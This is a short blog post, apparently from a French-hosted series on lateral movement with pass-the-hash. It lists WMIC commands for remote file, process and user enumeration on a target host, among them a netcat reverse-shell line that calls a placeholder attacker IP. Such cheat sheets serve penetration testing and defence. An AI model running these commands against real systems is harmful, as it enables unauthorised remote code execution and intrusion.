In previous article, we have introduced the used of WMIC in a « pass the hash » shell.
See below a list of useful wmic commands of gathered around the internet:
rem remember impersonate is ok but delegate is not
rem become familiar with the available aliases
wmic alias list brief
rem see the available methods for any class
wmic [class] call /?
rem file stuff
wmic /node:target DATAFILE where « drive=’c:’ AND path=’\\windows\\' » GET Name,readable,size
wmic /node:target datafile « c:\\temp\\test.txt » call rename c:\temp\abc.txt
wmic /node:target datafile « c:\\temp\\test.txt » call copy c:\temp\abc.txt
rem process stuff
wmic /node:target process call create « nc attacker-ip 9000 -e cmd.exe »
wmic /node:target process call create « cmd.exe /c echo test > c:\temp\test.txt »
wmic /node:target process where name= »explorer.exe » call terminate
wmic /node:target process where processid= »1234″ call terminate
wmic /node:target process get name, processid
rem users and groups stuff
WMIC /node:target USERACCOUNT LIST brief
wmic /node:target path Win32_GroupUser
One Response to “Demonstrating lateral movement with NTHASH Part #5”
Leave a Reply
Ce site utilise Akismet pour réduire les indésirables. En savoir plus sur comment les données de vos commentaires sont utilisées.
[…] psremoting on the remote target host (use wmic / see previous article) : powershell.exe « enable-psremoting […]